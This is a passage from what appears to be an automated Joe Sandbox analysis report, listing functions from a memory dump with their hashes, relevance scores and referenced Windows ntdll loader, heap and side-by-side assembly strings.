                                                              • Instruction Fuzzy Hash: FFC14731A04216ABDF25CF68E894F7EFBA5EF45710F1441ADED029B291E770C948D392
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 276c5e7658edfe46d9cf7d85936b6cef7a213b81fc7b94e26c4edfd571f8703c
                                                              • Instruction ID: 813fcc810bba569348adec0e082e8f030304ed4945565e159d94613dae6f09a3
                                                              • Opcode Fuzzy Hash: 276c5e7658edfe46d9cf7d85936b6cef7a213b81fc7b94e26c4edfd571f8703c
                                                              • Instruction Fuzzy Hash: 88912670A017159BEB25DF58D888BABFBA5BB40B24F14017CEB01AB385D7789A01DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0177645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017D99ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017D9A11, 017D9A3A
                                                              • apphelp.dll, xrefs: 01776496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017D9A2A
                                                              • LdrpInitShimEngine, xrefs: 017D99F4, 017D9A07, 017D9A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017D9A01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 28ad2c2da9e65ac113d7dab1ab1a097a4dd7adcd07c7048ea538648e8cedc9cb
                                                              • Instruction ID: 9beb36266af7b17f6ebb45ff8c53a0c2f05b6c8b079eba32356364f4ef49a8db
                                                              • Opcode Fuzzy Hash: 28ad2c2da9e65ac113d7dab1ab1a097a4dd7adcd07c7048ea538648e8cedc9cb
                                                              • Instruction Fuzzy Hash: 0351C3712087059FEB20DF24D855BABF7E8FB84648F10091DFA8597165D730EA04DB93
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 017F2165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017F21BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017F2180
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017F2178
                                                              • RtlGetAssemblyStorageRoot, xrefs: 017F2160, 017F219A, 017F21BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017F219F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 0c57a55338953a70dc2f27231f1ed0db28c0aad93f5d581710b617c5969fa848
                                                              • Instruction ID: ff679f458e4bd0ab922eac8e3d961233d32ee759aa95a491514df946380b3138
                                                              • Opcode Fuzzy Hash: 0c57a55338953a70dc2f27231f1ed0db28c0aad93f5d581710b617c5969fa848
                                                              • Instruction Fuzzy Hash: C1316676F4121577E7218A9D8C85F9BFB78DB61A80F04405CBB04B7242D370EE01C3A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017F8181, 017F81F5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 017F8170
                                                              • LdrpInitializeImportRedirection, xrefs: 017F8177, 017F81EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017BC6C3
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017F81E5
                                                              • LdrpInitializeProcess, xrefs: 017BC6C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: aaf91f63c730cf24b13ba9a34fd7c8f5a2bc34babc5dabe8bd5cbc7a16c24331
                                                              • Instruction ID: 643e37156f7c6ca68d1c428a919f69f1eab8dfa13d3eee2e600218b434bb53a1
                                                              • Opcode Fuzzy Hash: aaf91f63c730cf24b13ba9a34fd7c8f5a2bc34babc5dabe8bd5cbc7a16c24331
                                                              • Instruction Fuzzy Hash: B631D3B16447469BD324EB28DC89E6BF794AFD4B14F04065CF944AB295EA20ED04CBA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01799950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                              • API String ID: 0-3393094623
                                                              • Opcode ID: 2806512da5dafb235873d94d337bd059a3f7e04621a256635a4613a3eed241a8
                                                              • Instruction ID: 4195738f5e606180c33eacb5a1eda3fcf5e6dc1b3cacfe708d6016f3ac90d22d
                                                              • Opcode Fuzzy Hash: 2806512da5dafb235873d94d337bd059a3f7e04621a256635a4613a3eed241a8
                                                              • Instruction Fuzzy Hash: 9D028F71508381CFEB21CF68D48476BFBE5BF89708F44495EEA8987250E774D848CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 017C2DF0: LdrInitializeThunk.NTDLL ref: 017C2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 5510b00916817b311ca548b5852d9c1fafafeb808036fd581163a20e7a13110d
                                                              • Instruction ID: 63c7f7dfc6d42f6f732debe326e169963f8cffe21faba754fdb1a40f7ef6dd55
                                                              • Opcode Fuzzy Hash: 5510b00916817b311ca548b5852d9c1fafafeb808036fd581163a20e7a13110d
                                                              • Instruction Fuzzy Hash: 2F425A75900715DFDB21CF28C884BAAB7F4BF48714F1445ADEA899B245E770AA84CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01804F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                              • API String ID: 0-2518169356
                                                              • Opcode ID: bcaff534b9bdaf9bc803218e864ef2b5e729be9f943a8469cd21f510724ce06e
                                                              • Instruction ID: 59a0ed04a49317258c2728e86a051df893fcff41e31756c2a745a62088ff44db
                                                              • Opcode Fuzzy Hash: bcaff534b9bdaf9bc803218e864ef2b5e729be9f943a8469cd21f510724ce06e
                                                              • Instruction Fuzzy Hash: 2E91AE729006199BCB62CF6CCC81AAEB7B4FF48310F594169E915EB390D775DA01CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 871c33c45e221ab33b312ba94772e38f8ab506e2e8a043c5e598191657b28955
                                                              • Instruction ID: 821d26d31ef166b9a905742249215a4ea06c90e4423e97fdb801cfc2052ee2b0
                                                              • Opcode Fuzzy Hash: 871c33c45e221ab33b312ba94772e38f8ab506e2e8a043c5e598191657b28955
                                                              • Instruction Fuzzy Hash: E4139D70A00659CFDF29CF68D480BA9FBB1FF49304F1481A9D949AB386D734A949CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0179A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 017E7D03
                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 017E7D56
                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 017E7D39
                                                              • SsHd, xrefs: 0179A885
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                              • API String ID: 0-2905229100
                                                              • Opcode ID: 1ed40f230752456cc8b64bffc81c64672bd470a5de6db6efa9701df9c108a4ec
                                                              • Instruction ID: 66e2959a02dbff5c0c0d6a8ede903bf4317586472335a290c7d769b6ae5f8af8
                                                              • Opcode Fuzzy Hash: 1ed40f230752456cc8b64bffc81c64672bd470a5de6db6efa9701df9c108a4ec
                                                              • Instruction Fuzzy Hash: 5CD1CF35A012099FDF25CFA8E8C0AADFBF5FF58310F19406AE905AB351E3319995CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 24e330ec82fa99a8433c3a8ee3e8a2e8596f5dbe47c328b8dd8fb2593ae8dc5c
                                                              • Instruction ID: 1bea070513b74c50c4ac217665a33d77964805eaf542a23fe0e7e6bbbf3c8f3d
                                                              • Opcode Fuzzy Hash: 24e330ec82fa99a8433c3a8ee3e8a2e8596f5dbe47c328b8dd8fb2593ae8dc5c
                                                              • Instruction Fuzzy Hash: AFC17B74148382CFDB11EF58C044B6AF7E4BF88704F04496AF999CB251E738DA89CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017B8421
                                                              • @, xrefs: 017B8591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017B855E
                                                              • LdrpInitializeProcess, xrefs: 017B8422
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 3cdd0c77a1a96b2b0bcbab9d7f2d1f04d130039a26fa879f4687484ec52b77b0
                                                              • Instruction ID: 81ab261fa39c02e201d0523fbe393bdc1a7431916ba3d0ff5cf949f4c6232c66
                                                              • Opcode Fuzzy Hash: 3cdd0c77a1a96b2b0bcbab9d7f2d1f04d130039a26fa879f4687484ec52b77b0
                                                              • Instruction Fuzzy Hash: 7E9168B1548345AFE722EF25CC84FABFAECBF84744F40092EFA8496155E734D9448B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01790C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 017E54E0, 017E55A1
                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017E55AE
                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017E54ED
                                                              • HEAP[%wZ]: , xrefs: 017E54D1, 017E5592
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                              • API String ID: 0-1657114761
                                                              • Opcode ID: c69f913428043e1eb4aa7cbc4cf1071b8db2216f2de9affd06e32c3cffaa288c
                                                              • Instruction ID: 34b0b1f40bb1b8fb5070b75ad66c42794e57b9a4619be4aaa2403b7a92ab7236
                                                              • Opcode Fuzzy Hash: c69f913428043e1eb4aa7cbc4cf1071b8db2216f2de9affd06e32c3cffaa288c
                                                              • Instruction Fuzzy Hash: F1A1117461074ADFDB24CF28D444BBAFBF9BF05304F148469E49A8B246D730E988CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 017B28D8
                                                              • SXS: %s() passed the empty activation context, xrefs: 017F21DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017F22B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017F21D9, 017F22B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 65e6371c43273ffd0fad60625e446126512c1e3aa9bc66c0336baf4fcdd17c76
                                                              • Instruction ID: 833723c80af54a8cace4e6e532ec191024a8cb67ea67619282f0f98cb762a542
                                                              • Opcode Fuzzy Hash: 65e6371c43273ffd0fad60625e446126512c1e3aa9bc66c0336baf4fcdd17c76
                                                              • Instruction Fuzzy Hash: BDA1BF359052299BDB25CF68C8C8BE9F7B1BF58354F1541E9DA08AB352D730AE80CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017F3437
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017F342A
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017F3456
                                                              • RtlDeactivateActivationContext, xrefs: 017F3425, 017F3432, 017F3451
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: cb4d845a80928329e7256a710058351f6772ad6aca8adde42c6cfb4145bd3367
                                                              • Instruction ID: 51b571e53be1bb4624afdadc1f388c1a2ff88e15ee1f7815a92e1e31d62cf75a
                                                              • Opcode Fuzzy Hash: cb4d845a80928329e7256a710058351f6772ad6aca8adde42c6cfb4145bd3367
                                                              • Instruction Fuzzy Hash: 4261F076640A129BD722CE1DC881B7BF7E5BF90B50F14855DEA569B382CB30E801CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017E10AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017E1028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017E0FE5
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017E106B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: 983f8810eeda5fbf62976f25f2bb8a6d7af4cb56faf5f295c4eddeeccff8a1cd
                                                              • Instruction ID: 08c2ca69a4d61ce540f2926bbed452cd2589dc28a40a2e71fc23df7a1b055e76
                                                              • Opcode Fuzzy Hash: 983f8810eeda5fbf62976f25f2bb8a6d7af4cb56faf5f295c4eddeeccff8a1cd
                                                              • Instruction Fuzzy Hash: 0D71C4B1544305AFCB21EF18C889B9BBFE8AF54754F54046CF9488B14AD774D588CBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017EA992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017EA9A2
                                                              • LdrpDynamicShimModule, xrefs: 017EA998
                                                              • apphelp.dll, xrefs: 017A2462
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: f7846a511852caee0863607288eb4f4b6f2ac284b1d9ddae3aad9c69e34d1c2f
                                                              • Instruction ID: c41881ed7ae66300246ec61bbd860b812123a709ee4584bc3a720a54673bde2f
                                                              • Opcode Fuzzy Hash: f7846a511852caee0863607288eb4f4b6f2ac284b1d9ddae3aad9c69e34d1c2f
                                                              • Instruction Fuzzy Hash: C2311675A00301ABDB319F5D988DABAF7F5FB88714F260159F900A7259D7709A41CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 01793264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0179327D
                                                              • HEAP[%wZ]: , xrefs: 01793255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 0a2db6ccec7cd97f7c63dc46a272cf5eb6ace0a44b4e1e92adf8f1cd67d65397
                                                              • Instruction ID: e993718682f23b0797b693d914e012147f8a19bc296897d3d06e8c516d7d69c4
                                                              • Opcode Fuzzy Hash: 0a2db6ccec7cd97f7c63dc46a272cf5eb6ace0a44b4e1e92adf8f1cd67d65397
                                                              • Instruction Fuzzy Hash: EB929B71A046499FEF25CF68E444BAEFBF1FF48300F188099E859AB352D735A949CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018102C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                              • API String ID: 0-1670051934
                                                              • Opcode ID: 654eefe81385bf5e200d72b448c4c7c5fd16c6da1bdb54fedea4d5bdc4426085
                                                              • Instruction ID: 94c8a51b3ccc1a6e4224146dd71c26f45378feda3fafed124da7b79c567827bc
                                                              • Opcode Fuzzy Hash: 654eefe81385bf5e200d72b448c4c7c5fd16c6da1bdb54fedea4d5bdc4426085
                                                              • Instruction Fuzzy Hash: 58226CB3A047068FD724CF2DC991626BBE9BBC4314F24892EF1DAC7658D771E6848B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01790770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: 9b00a4a7a55ca337838aaee393cc1a61290ff64343832cfdb03134136131f709
                                                              • Instruction ID: 3230d2d0c9029708b7ff6fddd0d214ef55cfbb05809193df59f660e40632609d
                                                              • Opcode Fuzzy Hash: 9b00a4a7a55ca337838aaee393cc1a61290ff64343832cfdb03134136131f709
                                                              • Instruction Fuzzy Hash: 91F1BC74A1060ADFEB15CF68D888B6AF7F9FF48304F1441A8E5169B381D734EA85CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01781460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 01781596
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01781728
                                                              • HEAP[%wZ]: , xrefs: 01781712
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 27d50cda46e458c38eb9f9299b290d2ec30cae8a96c24425c132c91346b9a0c7
                                                              • Instruction ID: d45e77efa8016795edf9609366c6da24166ea45fefb24aa54392a1bf77dfdd7f
                                                              • Opcode Fuzzy Hash: 27d50cda46e458c38eb9f9299b290d2ec30cae8a96c24425c132c91346b9a0c7
                                                              • Instruction Fuzzy Hash: 7EE1F070A042469FDB29DF2CC491BBAFBF1AF44314F58849DE996CB246E734E942CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: $@
                                                              • API String ID: 2994545307-1077428164
                                                              • Opcode ID: 13f57eb49439f891e598a3c8edaaffc1e215ff7f106c6a98a78733b45bea7cba
